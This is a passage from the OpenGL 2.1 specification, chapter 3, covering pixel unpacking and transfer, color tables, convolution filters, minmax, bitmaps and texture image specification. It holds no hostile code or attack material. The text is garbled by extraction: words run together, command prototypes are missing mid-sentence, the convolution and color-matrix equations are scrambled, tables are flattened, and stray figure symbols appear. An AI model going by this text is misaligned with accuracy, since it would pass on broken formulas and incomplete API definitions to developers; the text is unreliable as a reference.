PACK BUFFER targets respectively. Initially, zero is bound for the PIXEL UNPACK BUFFER, indicating that imagespecification commands such as DrawPixels source their pixels from client mem-ory pointer parameters. However, if a non-zero buffer object is bound as the currentpixel unpack buffer, then the pointer parameter is treated as an offset into the des-ignated buffer object. param is a symbolic constant indicating a parameter to be set, and value is the valueto set it to. Table 3.2 summarizes the pixel transfer parameters that are set withPixelTransfer, their types, their initial values, and their allowable ranges. Settinga parameter to a value outside the given range results in the error INVALID VALUE.The same versions of the command exist as for PixelStore, and the same rulesapply to accepting and converting passed values to set parameters. The pixel map lookup tables are set with map is a symbolic map name, indicating the map to set, size indicates the size ofthe map, and values refers to an array of size map values The entries of a table may be specified using one of three types: single-precision floating-point, unsigned short integer, or unsigned integer, depending onwhich of the three versions of PixelMap is called. A table entry is convertedto the appropriate type when it is specified. An entry giving a color componentvalue is converted according to table 2.9. An entry giving a color index valueis converted from an unsigned short integer or unsigned integer to floating-point.An entry giving a stencil index is converted from single-precision floating-pointto an integer by rounding to nearest. The various tables and their initial sizesand entries are summarized in table 3.3. A table that takes an index as an ad-dress must have size = 2n or the error INVALID VALUE results. The maximumallowable size of each table is specified by the implementation dependent valueMAX PIXEL MAP TABLE, but must be at least 32 (a single maximum applies to alltables). The error INVALID VALUE is generated if a size larger than the imple-mented maximum, or less than one, is given to PixelMap. If a pixel unpack buffer is bound (as indicated by a non-zero value ofPIXEL UNPACK BUFFER BINDING), values is an offset into the pixel unpackbuffer; otherwise, values is a pointer to client memory. All pixel storage and pixeltransfer modes are ignored when specifying a pixel map. n machine units are readwhere n is the size of the pixel map times the size of a float, uint, or ushort target must be one of the regular color table names listed in table 3.4 to definethe table. A proxy table name is a special case discussed later in this section.width, format, type, and data specify an image in memory with the same mean-ing and allowed values as the corresponding arguments to DrawPixels (see sec-tion 3.6.4), with height taken to be 1. The maximum allowable width of a tableis implementation-dependent, but must be at least 32. The formats COLOR INDEX,DEPTH COMPONENT, and STENCIL INDEX and the type BITMAP are not allowed. The specified image is taken from memory and processed just as if DrawPixelswere called, stopping after the final expansion to RGBA. The R, G, B, and A com-ponents of each pixel are then scaled by the four COLOR TABLE SCALE parameters, Table 3.4: Color table names. Regular tables have associated image data. Proxytables have no image data, and are used only to determine if an image can be loadedinto the corresponding regular table. biased by the four COLOR TABLE BIAS parameters, and clamped to [0, 1]. Theseparameters are set by calling ColorTableParameterfv as described below. color lookup table is redefined to have width entries, each with the speci-fied internal format. The table is formed with indices 0 through width − 1. Tablelocation i is specified by the ith image pixel, counting from zero. The error INVALID VALUE is generated if width is not zero or a non-negativepower of two. The error TABLE TOO LARGE is generated if the specified colorlookup table is too large for the implementation. The scale and bias parameters for a table are specified by calling target must be a regular color table name. pname is one of COLOR TABLE SCALEor COLOR TABLE BIAS. params points to an array of four values: red, green, blue,and alpha, in that order. A GL implementation may vary its allocation of internal component resolutionbased on any ColorTable parameter, but the allocation must not be a function ofany other factor, and cannot be changed once it is established. Allocations mustbe invariant; the same allocation must be made each time a color table is specifiedwith the same parameter values. These allocation rules also apply to proxy colortables, which are described later in this section. defines a color table in exactly the manner of ColorTable, except that table dataare taken from the framebuffer, rather than from client memory. target must be aregular color table name. x, y, and width correspond precisely to the correspondingarguments of CopyPixels (refer to section 4.3.3); they specify the image’s widthand the lower left (x, y) coordinates of the framebuffer region to be copied. Theimage is taken from the framebuffer exactly as if these arguments were passed toCopyPixels with argument type set to COLOR and height set to 1, stopping after thefinal expansion to RGBA. Subsequent processing is identical to that described for ColorTable, beginningwith scaling by COLOR TABLE SCALE. Parameters target, internalformat and widthare specified using the same values, with the same meanings, as the equivalentarguments of ColorTable. format is taken to be RGBA. Two additional commands, respecify only a portion of an existing color table. No change is made to the inter-nalformat or width parameters of the specified color table, nor is any change madeto table entries outside the specified portion. target must be a regular color tablename. ColorSubTable arguments format, type, and data match the corresponding ar-guments to ColorTable, meaning that they are specified using the same values,and have the same meanings. Likewise, CopyColorSubTable arguments x, y, andcount match the x, y, and width arguments of CopyColorTable. Both of the Color-SubTable commands interpret and process pixel groups in exactly the manner oftheir ColorTable counterparts, except that the assignment of R, G, B, and A pixelgroup values to the color table components is controlled by the internalformat ofthe table, not by an argument to the command. target must be CONVOLUTION 2D. width, height, format, type, and data specify animage in memory with the same meaning and allowed values as the correspondingparameters to DrawPixels. The formats COLOR INDEX, DEPTH COMPONENT, andSTENCIL INDEX and the type BITMAP are not allowed. The specified image is extracted from memory and processed just as ifDrawPixels were called, stopping after the final expansion to RGBA. TheR, G, B, and A components of each pixel are then scaled by the four two-dimensional CONVOLUTION FILTER SCALE parameters and biased by the fourtwo-dimensional CONVOLUTION FILTER BIAS parameters. These parameters areset by calling ConvolutionParameterfv as described below. No clamping takesplace at any time during this process. red, green, blue, alpha, luminance, and/or intensity components of thepixels are stored in floating point, rather than integer format. They form a two-dimensional image indexed with coordinates i, j such that i increases from left toright, starting at zero, and j increases from bottom to top, also starting at zero.Image location i, j is specified by the N th pixel, counting from zero, where N = i + j ∗ width target must be CONVOLUTION 1D. internalformat, width, format, and type haveidentical semantics and accept the same values as do their two-dimensional coun-terparts. data must point to a one-dimensional image, however. The image is extracted from memory and processed as if ConvolutionFilter2Dwere called with a height of 1, except that it is scaled and biased by the one-dimensional CONVOLUTION FILTER SCALE and CONVOLUTION FILTER BIASparameters. These parameters are specified exactly as the two-dimensionalparameters, except that ConvolutionParameterfv is called with targetCONVOLUTION 1D. The image is formed with coordinates i such that i increases from left to right,starting at zero. Image location i is specified by the ith pixel, counting from zero. The error INVALID VALUE is generated if width is greater than the maximumsupported value. This value is queried using GetConvolutionParameteriv, settingtarget to CONVOLUTION 1D and pname to MAX CONVOLUTION WIDTH. Special facilities are provided for the definition of two-dimensional sepa-rable filters – filters whose image can be represented as the product of twoone-dimensional images, rather than as full two-dimensional images. A two-dimensional separable convolution filter is specified with target must be SEPARABLE 2D. internalformat specifies the formats of the tableentries of the two one-dimensional images that will be retained. row points to awidth pixel wide image of the specified format and type. column points to a heightpixel high image, also of the specified format and type. The two images are extracted from memory and processed as if Convolu-tionFilter1D were called separately for each, except that each image is scaledand biased by the two-dimensional separable CONVOLUTION FILTER SCALE andCONVOLUTION FILTER BIAS parameters. These parameters are specified exactlyas the one-dimensional and two-dimensional parameters, except that Convolution-Parameteriv is called with target SEPARABLE 2D. One and two-dimensional filters may also be specified using image data taken di-rectly from the framebuffer. The command and separable only), an integer describing the internal format of the filter, and twogroups of four floating-point numbers to store the filter scale and bias. Each initial convolution filter is null (zero width and height, internal formatRGBA, with zero-sized components). The initial value of all scale parameters is(1,1,1,1) and the initial value of all bias parameters is (0,0,0,0). target must be MINMAX. internalformat specifies the format of the table entries.sink specifies whether pixel groups will be consumed by the minmax operation(TRUE) or passed on to final conversion (FALSE). The error INVALID ENUM is generated if internalformat is not one of the for-mats in table 3.15 or table 3.16, or is 1, 2, 3, 4, or any of the DEPTH or INTENSITYformats in those tables. The resulting table always has 2 entries, each with valuescorresponding only to the components of the internal format. The state necessary for minmax operation is a table containing two elements(the first element stores the minimum values, the second stores the maximum val-ues), an integer describing the internal format of the table, and a flag indicatingwhether or not pixel groups are consumed by the operation. The initial state isa minimum table entry set to the maximum representable value and a maximum table entry set to the minimum representable value. Internal format is set to RGBAand the initial value of the flag is false. UnpackingData are taken from the currently bound pixel unpack buffer or client memory as asequence of signed or unsigned bytes (GL data types byte and ubyte), signed orunsigned short integers (GL data types short and ushort), signed or unsignedintegers (GL data types int and uint), or floating point values (GL data typefloat). These elements are grouped into sets of one, two, three, or four values,depending on the format, to form a group. Table 3.6 summarizes the format ofgroups obtained from memory; it also indicates those formats that yield indicesand those that yield components. If a pixel unpack buffer is bound (as indicated by a non-zero value ofPIXEL UNPACK BUFFER BINDING), data is an offset into the pixel unpack bufferand the pixels are unpacked from the buffer relative to this offset; otherwise, data isa pointer to client memory and the pixels are unpacked from client memory relativeto the pointer. If a pixel unpack buffer object is bound and unpacking the pixel dataaccording to the process described below would access memory beyond the size ofthe pixel unpack buffer’s memory size, an INVALID OPERATION error results. If apixel unpack buffer object is bound and data is not evenly divisible by the number unpack RGBA, L color index convert to float Pixel Storage Operations convert L to RGB scale Pixel Transfer shift and bias Operations and offset RGBA to RGBA index to RGBA index to index lookup lookup lookup color table lookup convolution color table post lookup color matrix color matrix minmax Table 3.5: DrawPixels and ReadPixels type parameter values and the correspond-ing GL data types. Refer to table 2.2 for definitions of GL data types. Specialinterpretations are described near the end of section 3.6.4. Table 3.6: DrawPixels and ReadPixels formats. The second column gives a de-scription of and the number and order of elements in a group. Unless specified asan index, formats yield components. of basic machine units needed to store in memory the corresponding GL data typefrom table 3.5 for the type parameter, an INVALID OPERATION error results. By default the values of each GL data type are interpreted as they would bespecified in the language of the client’s GL binding. If UNPACK SWAP BYTES isenabled, however, then the values are interpreted with the bit orderings modifiedas per table 3.7. The modified bit orderings are defined only if the GL data typeubyte has eight bits, and then for each specific GL data type only if that type isrepresented with 8, 16, or 32 bits. The groups in memory are treated as being arranged in a rectangle. This Table 3.7: Bit ordering modification of elements when UNPACK SWAP BYTES isenabled. These reorderings are defined only when GL data type ubyte has 8 bits,and then only for GL data types with 8, 16, or 32 bits. Bit 0 is the least significant. rectangle consists of a series of rows, with the first element of the first groupof the first row pointed to by the pointer passed to DrawPixels. If the value ofUNPACK ROW LENGTH is not positive, then the number of groups in a row is width;otherwise the number of groups is UNPACK ROW LENGTH. If p indicates the loca-tion in memory of the first element of the first row, then the first element of the N throw is indicated by p + Nk (3.12) ROW_LENGTH subimage SKIP_PIXELS SKIP_ROWS Figure 3.8. Selecting a subimage from an image. The indicated parameter names are prefixed by UNPACK for DrawPixels and by PACK for ReadPixels. Bitfield locations of the first, second, third, and fourth components of eachpacked pixel type are illustrated in tables 3.9, 3.10, and 3.11. Each bitfield isinterpreted as an unsigned integer value. If the base GL type is supported withmore than the minimum precision (e.g. a 9-bit byte) the packed components areright-justified in the pixel. Components are normally packed with the first component in the most signif-icant bits of the bitfield, and successive component occupying progressively lesssignificant locations. Types whose token names end with REV reverse the compo-nent packing order from least to most significant locations. In all cases, the mostsignificant bit of each component is packed in the most significant bit location ofits location in the bitfield.UNSIGNED BYTE 3 3 2: 7 6 5 4 3 2 1 0 Table 3.9: UNSIGNED BYTE formats. Bit numbers are indicated for each compo-nent. UNSIGNED SHORT 5 6 5: 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 0 UNSIGNED SHORT 4 4 4 4: 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 0 UNSIGNED SHORT 5 5 5 1: 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 0 UNSIGNED INT 8 8 8 8: 31 30 29 28 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 0 UNSIGNED INT 10 10 10 2: 31 30 29 28 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 0 l k=a (3.14) 8a There is a mechanism for selecting a sub-rectangle of elements from a BITMAPimage as well. Before obtaining the first element from memory, the pointer sup-plied to DrawPixels is effectively advanced by UNPACK SKIP ROWS ∗ k ubytes.Then UNPACK SKIP PIXELS 1-bit elements are ignored, and the subsequent width1-bit elements are obtained, without advancing the ubyte pointer, after which thepointer is advanced by k ubytes. height sets of width elements are obtained thisway. Conversion to floating-pointThis step applies only to groups of components. It is not performed on indices.Each element in a group is converted to a floating-point value according to the ap- propriate formula in table 2.9 (section 2.14). For packed pixel types, each elementin the group is converted by computing c / (2N − 1), where c is the unsigned inte-ger value of the bitfield containing the element and N is the number of bits in thebitfield. Conversion to RGBThis step is applied only if the format is LUMINANCE or LUMINANCE ALPHA. If theformat is LUMINANCE, then each group of one element is converted to a group ofR, G, and B (three) elements by copying the original single element into each ofthe three new elements. If the format is LUMINANCE ALPHA, then each group oftwo elements is converted to a group of R, G, B, and A (four) elements by copyingthe first original element into each of the first three new elements and copying thesecond original element to the A (fourth) new element. Final ConversionFor a color index, final conversion consists of masking the bits of the index to theleft of the binary point by 2n − 1, where n is the number of bits in an index buffer.For RGBA components, each element is clamped to [0, 1]. The resulting values areconverted to fixed-point according to the rules given in section 2.14.9 (Final ColorProcessing). For a depth component, an element is first clamped to [0, 1] and then convertedto fixed-point as if it were a window z value (see section 2.11.1, Controlling theViewport). Conversion to FragmentsThe conversion of a group to fragments is controlled with Let (xrp , yrp ) be the current raster position (section 2.13). (If the current rasterposition is invalid, then DrawPixels is ignored; pixel transfer operations do notupdate the histogram or minmax tables, and no fragments are generated. However,the histogram and minmax tables are updated even if the corresponding fragmentsare later rejected by the pixel ownership (section 4.1.1) or scissor (section 4.1.2)tests.) If a particular group (index or components) is the nth in a row and belongs tothe mth row, consider the region in window coordinates bounded by the rectanglewith corners 1. RGBA component: Each group comprises four color components: red, green, blue, and alpha. Each operation described in this section is applied sequentially to each pixel groupin an image. Many operations are applied only to pixel groups of certain kinds; ifan operation is not applicable to a given group, it is skipped. Arithmetic on Components This step applies only to RGBA component and depth component groups. Eachcomponent is multiplied by an appropriate signed scale factor: RED SCALE for anR component, GREEN SCALE for a G component, BLUE SCALE for a B component,and ALPHA SCALE for an A component, or DEPTH SCALE for a depth component.Then the result is added to the appropriate signed bias: RED BIAS, GREEN BIAS,BLUE BIAS, ALPHA BIAS, or DEPTH BIAS. Arithmetic on Indices This step applies only to color index and stencil index groups. If the index is afloating-point value, it is converted to fixed-point, with an unspecified number ofbits to the right of the binary point and at least dlog2 (MAX PIXEL MAP TABLE)ebits to the left of the binary point. Indices that are already integers remain so; anyfraction bits in the resulting fixed-point value are zero. The fixed-point index is then shifted by |INDEX SHIFT| bits, left ifINDEX SHIFT > 0 and right otherwise. In either case the shift is zero-filled. Then,the signed integer offset INDEX OFFSET is added to the index. This step applies only to RGBA component groups, and is skipped if MAP COLOR isFALSE. First, each component is clamped to the range [0, 1]. There is a table associ-ated with each of the R, G, B, and A component elements: PIXEL MAP R TO R forR, PIXEL MAP G TO G for G, PIXEL MAP B TO B for B, and PIXEL MAP A TO Afor A. Each element is multiplied by an integer one less than the size of the corre-sponding table, and, for each element, an address is found by rounding this valueto the nearest integer. For each element, the addressed value in the correspondingtable replaces the element. Table 3.13: Color table lookup. Rt , Gt , Bt , At , Lt , and It are color table valuesthat are assigned to pixel components R, G, B, and A depending on the tableformat. When there is no assignment, the component value is left unchanged bylookup. performed. The internal format of the table determines which components of the groupwill be replaced (see table 3.13). The components to be replaced are convertedto indices by clamping to [0, 1], multiplying by an integer one less than the widthof the table, and rounding to the nearest integer. Components are replaced by thetable entry at the index. The required state is one bit indicating whether color table lookup is enabledor disabled. In the initial state, lookup is disabled. ConvolutionThis step applies only to RGBA component groups. If CONVOLUTION 1Dis enabled, the one-dimensional convolution filter is applied only to the one-dimensional texture images passed to TexImage1D, TexSubImage1D, Copy-TexImage1D, and CopyTexSubImage1D. If CONVOLUTION 2D is enabled, thetwo-dimensional convolution filter is applied only to the two-dimensional im-ages passed to DrawPixels, CopyPixels, ReadPixels, TexImage2D, TexSubIm-age2D, CopyTexImage2D, CopyTexSubImage2D, and CopyTexSubImage3D.If SEPARABLE 2D is enabled, and CONVOLUTION 2D is disabled, the separabletwo-dimensional convolution filter is instead applied these images. The convolution operation is a sum of products of source image pixels andconvolution filter pixels. Source image pixels always have four components: red,green, blue, and alpha, denoted in the equations below as Rs , Gs , Bs , and As .Filter pixels may be stored in one of five formats, with 1, 2, 3, or 4 components.These components are denoted as Rf , Gf , Bf , Af , Lf , and If in the equationsbelow. The result of the convolution operation is the 4-tuple R,G,B,A. Depending on the internal format of the filter, individual color components of each sourceimage pixel are convolved with one filter component, or are passed unmodified.The rules for this are defined in table 3.14. The convolution operation is defined differently for each of the three convolu-tion filters. The variables Wf and Hf refer to the dimensions of the convolutionfilter. The variables Ws and Hs refer to the dimensions of the source pixel image. The convolution equations are defined as follows, where C refers to the filteredresult, Cf refers to the one- or two-dimensional convolution filter, and Crow andCcolumn refer to the two one-dimensional filters comprising the two-dimensionalseparable filter. Cs0 depends on the source image color Cs and the convolution bor-der mode as described below. Cr , the filtered output image, depends on all of thesevariables and is described separately for each border mode. The pixel indexingnomenclature is decribed in the Convolution Filter Specification subsection ofsection 3.6.3. One-dimensional filter: Wf −1 0 Cs0 [i0 + n] ∗ Cf [n] X C[i ] = n=0 Two-dimensional filter: Wf −1 Hf −1 0 0 Cs0 [i0 + n, j 0 + m] ∗ Cf [n, m] X X C[i , j ] = n=0 m=0 Wf −1 Hf −1 0 0 Cs0 [i0 + n, j 0 + m] ∗ Crow [n] ∗ Ccolumn [m] X X C[i , j ] = n=0 m=0 where target is the name of the filter, pname is CONVOLUTION BORDER MODE, andparam is one of REDUCE, CONSTANT BORDER or REPLICATE BORDER. the RGBA color to be used as the image border. Integer color components areinterpreted linearly such that the most positive integer maps to 1.0, and the mostnegative integer maps to -1.0. Floating point color components are not clampedwhen they are specified. For a one-dimensional filter, the result color is defined by Cr [i] = C[i − Cw ]where C[i0 ] is computed using the following equation for Cs0 [i0 ]: ( Cs [i0 ], 0 ≤ i0 < Ws Cs0 [i0 ] = Cc , otherwise Cr [i, j] = C[i − Cw , j − Ch ]where C[i0 , j 0 ] is computed using the following equation for Cs0 [i0 , j 0 ]: ( Cs [i0 , j 0 ], 0 ≤ i0 < Ws , 0 ≤ j 0 < Hs Cs0 [i0 , j 0 ] = Cc , otherwise Cr [i] = C[i − Cw ] where C[i0 ] is computed using the following equation for Cs0 [i0 ]: Cr [i, j] = C[i − Cw , j − Ch ]where C[i0 , j 0 ] is computed using the following equation for Cs0 [i0 , j 0 ]: R G B Aare transformed to R0 Rs 0 0 0 R Rb G0 0 Gs 0 0 G Gb B0 = 0 M + . 0 c B Bb 0 Bs A0 0 0 0 As A Ab Histogram Minmax This step applies only to RGBA component groups. Minmax operation is enabledor disabled by calling Enable or Disable with the symbolic constant MINMAX. If the format of the minmax table includes red or luminance, the red compo-nent value replaces the red or luminance value in the minimum table element ifand only if it is less than that component. Likewise, if the format includes red orluminance and the red component of the group is greater than the red or luminancevalue in the maximum element, the red group component replaces the red or lumi-nance maximum component. If the format of the table includes green, the greengroup component conditionally replaces the green minimum and/or maximum ifit is smaller or larger, respectively. The blue and alpha group components aresimilarly tested and replaced, if the table format includes blue and/or alpha. Theinternal type of the minimum and maximum component values is floating point,with at least the same representable range as a floating point number used to rep-resent colors (section 2.1.1). There are no semantics defined for the treatment of (Xrp + Zx ∗ n, Yrp + Zy ∗ m)and (Xrp + Zx ∗ (n + 1), Yrp + Zy ∗ (m + 1))where Zx and Zy are the pixel zoom factors specified by PixelZoom, and may eachbe either positive or negative. A fragment representing group (n, m) is producedfor each framebuffer pixel with one or more sample points that lie inside, or onthe bottom or left boundary, of this rectangle. Each fragment so produced takes itsassociated data from the group and from the current raster position, in a mannerconsistent with the discussion in the Conversion to Fragments subsection of sec-tion 3.6.4. All depth and color sample values are assigned the same value, takeneither from their group (for depth and color component groups) or from the cur-rent raster position (if they are not). All sample values are assigned the same fogcoordinate and the same set of texture coordinates, taken from the current rasterposition. A single pixel rectangle will generate multiple, perhaps very many fragmentsfor the same framebuffer pixel, depending on the pixel zoom factors. 3.7 BitmapsBitmaps are rectangles of zeros and ones specifying a particular pattern of frag-ments to be produced. Each of these fragments has the same associated data. Thesedata are those associated with the current raster position. ! ! ! $ $ % $ % % " " # " # # $ $ % $ % % & & ' & ' ' h = 12 ybo = 1.0 xbo = 2.5 w=8 Figure 3.9. A bitmap and its associated parameters. xbi and ybi are not shown. w and h comprise the integer width and height of the rectangular bitmap, respec-tively. (xbo , ybo ) gives the floating-point x and y values of the bitmap’s origin.(xbi , ybi ) gives the floating-point x and y increments that are added to the rasterposition after the bitmap is rasterized. data is a pointer to a bitmap. Like a polygon pattern, a bitmap is unpacked from memory according to theprocedure given in section 3.6.4 for DrawPixels; it is as if the width and heightpassed to that command were equal to w and h, respectively, the type were BITMAP,and the format were COLOR INDEX. The unpacked values (before any conversionor arithmetic would have been performed) form a stipple pattern of zeros and ones.See figure 3.9. A bitmap sent using Bitmap is rasterized as follows. First, if the current rasterposition is invalid (the valid bit is reset), the bitmap is ignored. Otherwise, a rect-angular array of fragments is constructed, with lower left corner at and upper right corner at (xll +w, yll +h) where w and h are the width and height ofthe bitmap, respectively. Fragments in the array are produced if the correspondingbit in the bitmap is 1 and not produced otherwise. The associated data for eachfragment are those associated with the current raster position. Once the fragmentshave been produced, the current raster position is updated: 3.8 TexturingTexturing maps a portion of one or more specified images onto each primitive forwhich texturing is enabled. This mapping is accomplished by using the color of animage at the location indicated by a texture coordinate set’s (s, t, r, q) cordinates. Implementations must support texturing using at least two images at a time.Each fragment or vertex carries multiple sets of texture coordinates (s, t, r, q)which are used to index separate images to produce color values which are collec-tively used to modify the resulting transformed vertex or fragment color. Texturingis specified only for RGBA mode; its use in color index mode is undefined. Thefollowing subsections (up to and including section 3.8.8) specify the GL operationwith a single texture and section 3.8.16 specifies the details of how multiple textureunits interact. The GL provides two ways to specify the details of how texturing of a prim-itive is effected. The first is referred to as fixed-functionality, and is described inthis section. The second is referred to as a fragment shader, and is described insection 3.11. The specification of the image to be texture mapped and the meansby which the image is filtered when applied to the primitive are common to bothmethods and are discussed in this section. The fixed functionality method for de-termining what RGBA value is produced is also described in this section. If afragment shader is active, the method for determining the RGBA value is specifiedby an application-supplied fragment shader as described in the OpenGL ShadingLanguage Specification. When no fragment shader is active, the coordinates used for texturing are(s/q, t/q, r/q), derived from the original texture coordinates (s, t, r, q). If the qtexture coordinate is less than or equal to zero, the coordinates used for texturingare undefined. When a fragment shader is active, the (s, t, r, q) coordinates areavailable to the fragment shader. The coordinates used for texturing in a fragmentshader are defined by the OpenGL Shading Language Specification. Table 3.15: Conversion from RGBA and depth pixel components to internal tex-ture, table, or filter components. See section 3.8.13 for a description of the texturecomponents R, G, B, A, L, I, and D. Sized Base R G B A L I D Internal Format Internal Format bits bits bits bits bits bits bits ALPHA4 ALPHA 4 ALPHA8 ALPHA 8 ALPHA12 ALPHA 12 ALPHA16 ALPHA 16 DEPTH COMPONENT16 DEPTH COMPONENT 16 DEPTH COMPONENT24 DEPTH COMPONENT 24 DEPTH COMPONENT32 DEPTH COMPONENT 32 LUMINANCE4 LUMINANCE 4 LUMINANCE8 LUMINANCE 8 LUMINANCE12 LUMINANCE 12 LUMINANCE16 LUMINANCE 16 LUMINANCE4 ALPHA4 LUMINANCE ALPHA 4 4 LUMINANCE6 ALPHA2 LUMINANCE ALPHA 2 6 LUMINANCE8 ALPHA8 LUMINANCE ALPHA 8 8 LUMINANCE12 ALPHA4 LUMINANCE ALPHA 4 12 LUMINANCE12 ALPHA12 LUMINANCE ALPHA 12 12 LUMINANCE16 ALPHA16 LUMINANCE ALPHA 16 16 INTENSITY4 INTENSITY 4 INTENSITY8 INTENSITY 8 INTENSITY12 INTENSITY 12 INTENSITY16 INTENSITY 16 R3 G3 B2 RGB 3 3 2 RGB4 RGB 4 4 4 RGB5 RGB 5 5 5 RGB8 RGB 8 8 8 RGB10 RGB 10 10 10 RGB12 RGB 12 12 12 RGB16 RGB 16 16 16 RGBA2 RGBA 2 2 2 2 RGBA4 RGBA 4 4 4 4 RGB5 A1 RGBA 5 5 5 1 RGBA8 RGBA 8 8 8 8 RGB10 A2 RGBA 10 10 10 2 RGBA12 RGBA 12 12 12 12 RGBA16 RGBA 16 16 16 16 Sized internal formats continued on next page Table 3.17: Generic and specific compressed internal formats. No specific formatsare defined by OpenGL 2.1; however, several specific specific compression typesare defined in GL extensions. image format may not be affected by the data parameter. Allocations must be in-variant; the same allocation and compressed image format must be chosen eachtime a texture image is specified with the same parameter values. These allocationrules also apply to proxy textures, which are described in section 3.8.11. The image itself (referred to by data) is a sequence of groups of values. Thefirst group is the lower left back corner of the texture image. Subsequent groupsfill out rows of width width from left to right; height rows are stacked from bottomto top forming a single two-dimensional image slice; and depth slices are stackedfrom back to front. When the final R, G, B, and A components have been computedfor a group, they are assigned to components of a texel as described by table 3.15.Counting from zero, each resulting N th texel is assigned internal integer coordi-nates (i, j, k), where i = (N mod width) − bs N j = (b c mod height) − bs width N k = (b c mod depth) − bs width × heightand bs is the specified border width. Thus the last two-dimensional image slice ofthe three-dimensional image is indexed with the highest value of k. Each color component is converted (by rounding to nearest) to a fixed-pointvalue with n bits, where n is the number of bits of storage allocated to that com-ponent in the image array. We assume that the fixed-point representation usedrepresents each value k/(2n − 1), where k ∈ {0, 1, . . . , 2n − 1}, as k (e.g. 1.0 isrepresented in binary as a string of all ones). The level argument to TexImage3D is an integer level-of-detail number. Levelsof detail are discussed below, under Mipmapping. The main texture image has alevel of detail number of 0. If a level-of-detail less than zero is specified, the errorINVALID VALUE is generated. The border argument to TexImage3D is a border width. The significance ofborders is described below. The border width affects the dimensions of the textureimage: let ws = wt + 2bs (3.15) hs = ht + 2bs (3.16) ds = dt + 2bs (3.17)the null texture is specified for the level-of-detail specified by texture parameterTEXTURE BASE LEVEL (see section 3.8.4), it is as if texturing were disabled. Currently, the maximum border width bt is 1. If bs is less than zero, or greaterthan bt , then the error INVALID VALUE is generated. The maximum allowable width, height, or depth of a three-dimensional textureimage is an implementation dependent function of the level-of-detail and internalformat of the resulting image array. It must be at least 2k−lod +2bt for image arraysof level-of-detail 0 through k, where k is the log base 2 of MAX 3D TEXTURE SIZE,lod is the level-of-detail of the image array, and bt is the maximum border width.It may be zero for image arrays of any level-of-detail greater than k. The errorINVALID VALUE is generated if the specified image is too large to be stored underany conditions. If a pixel unpack buffer object is bound and storing texture data would accessmemory beyond the end of the pixel unpack buffer, an INVALID OPERATION errorresults. In a similar fashion, the maximum allowable width of a one- or two-dimensional texture image, and the maximum allowable height of a two-dimensional texture image, must be at least 2k−lod + 2bt for image arrays of level0 through k, where k is the log base 2 of MAX TEXTURE SIZE. The maximum al-lowable width and height of a cube map texture must be the same, and must be atleast 2k−lod + 2bt for image arrays level 0 through k, where k is the log base 2 ofMAX CUBE MAP TEXTURE SIZE. An implementation may allow an image array of level 0 to be created only ifthat single image array can be supported. Additional constraints on the creation ofimage arrays of level 1 or greater are described in more detail in section 3.8.10. The command a cube map texture. Additionally, target may be either PROXY TEXTURE 2D fora two-dimensional proxy texture or PROXY TEXTURE CUBE MAP for a cube mapproxy texture in the special case discussed in section 3.8.11. The other parametersmatch the corresponding parameters of TexImage3D. For the purposes of decoding the texture image, TexImage2D is equivalent tocalling TexImage3D with corresponding arguments and depth of 1, except that The image indicated to the GL by the image pointer is decoded and copied intothe GL’s internal memory. This copying effectively places the decoded image in-side a border of the maximum allowable width bt whether or not a border has beenspecified (see figure 3.10) 1 . If no border or a border smaller than the maximumallowable width has been specified, then the image is still stored as if it were sur-rounded by a border of the maximum possible width. Any excess border (whichsurrounds the specified image, including any border) is assigned unspecified val-ues. A two-dimensional texture has a border only at its left, right, top, and bottomends, and a one-dimensional texture has a border only at its left and right ends. We shall refer to the (possibly border augmented) decoded image as the texturearray. A three-dimensional texture array has width, height, and depth ws , hs , andds as defined respectively in equations 3.15, 3.16, and 3.17. A two-dimensionaltexture array has depth ds = 1, with height hs and width ws as above, and a one-dimensional texture array has depth ds = 1, height hs = 1, and width ws as above. An element (i, j, k) of the texture array is called a texel (for a two-dimensionaltexture, k is irrelevant; for a one-dimensional texture, j and k are both irrelevant).The texture value used in texturing a fragment is determined by that fragment’sassociated (s, t, r) coordinates, but may not correspond to any actual texel. Seefigure 3.10. If the data argument of TexImage1D, TexImage2D, or TexImage3D is a nullpointer (a zero-valued pointer in the C implementation), and the pixel unpackbuffer object is zero, a one-, two-, or three-dimensional texture array is createdwith the specified target, level, internalformat, border, width, height, and depth,but with unspecified image contents. In this case no pixel values are accessedin client memory, and no pixel processing is performed. Errors are generated,however, exactly as though the data pointer were valid. Otherwise if the pixelunpack buffer object is non-zero, the data argument is treatedly normally to referto the beginning of the pixel unpack buffer object’s data. 5.0 4 1.0 3 2 α t v j β 1 0 0.0 −1 −1.0 −1 0 1 2 3 4 5 6 7 8 i −1.0 u 9.0 0.0 s 1.0 Figure 3.10. A texture image and the coordinates used to access it. This is a two- dimensional texture with n = 3 and m = 2. A one-dimensional texture would consist of a single horizontal strip. α and β, values used in blending adjacent texels to obtain a texture value, are also shown. arguments width, height, format, type, and data match the corresponding argu-ments to TexImage2D, and TexSubImage1D arguments width, format, type, anddata match the corresponding arguments to TexImage1D. CopyTexSubImage3D and CopyTexSubImage2D arguments x, y, width,and height match the corresponding arguments to CopyTexImage2D2 . CopyTex-SubImage1D arguments x, y, and width match the corresponding arguments toCopyTexImage1D. Each of the TexSubImage commands interprets and processespixel groups in exactly the manner of its TexImage counterpart, except that the as-signment of R, G, B, A, and depth pixel group values to the texture componentsis controlled by the internalformat of the texture array, not by an argument to thecommand. The same constraints and errors apply to the TexSubImage commands’argument format and the internalformat of the texture array being respecified asapply to the format and internalformat arguments of its TexImage counterparts. Arguments xoffset, yoffset, and zoffset of TexSubImage3D and CopyTex-SubImage3D specify the lower left texel coordinates of a width-wide by height-high by depth-deep rectangular subregion of the texture array. The depth argumentassociated with CopyTexSubImage3D is always 1, because framebuffer memoryis two-dimensional - only a portion of a single s, t slice of a three-dimensionaltexture is replaced by CopyTexSubImage3D. Negative values of xoffset, yoffset, and zoffset correspond to the coordinatesof border texels, addressed as in figure 3.10. Taking ws , hs , ds , and bs to be thespecified width, height, depth, and border width of the texture array, and taking x,y, z, w, h, and d to be the xoffset, yoffset, zoffset, width, height, and depth argumentvalues, any of the following relationships generates the error INVALID VALUE: x < −bs x + w > ws − b s y < −bs y + h > h s − bs z < −bs z + d > d s − bsCounting from zero, the nth pixel group is assigned to the texel with internal integercoordinates [i, j, k], where i = x + (n mod w) 2 Because the 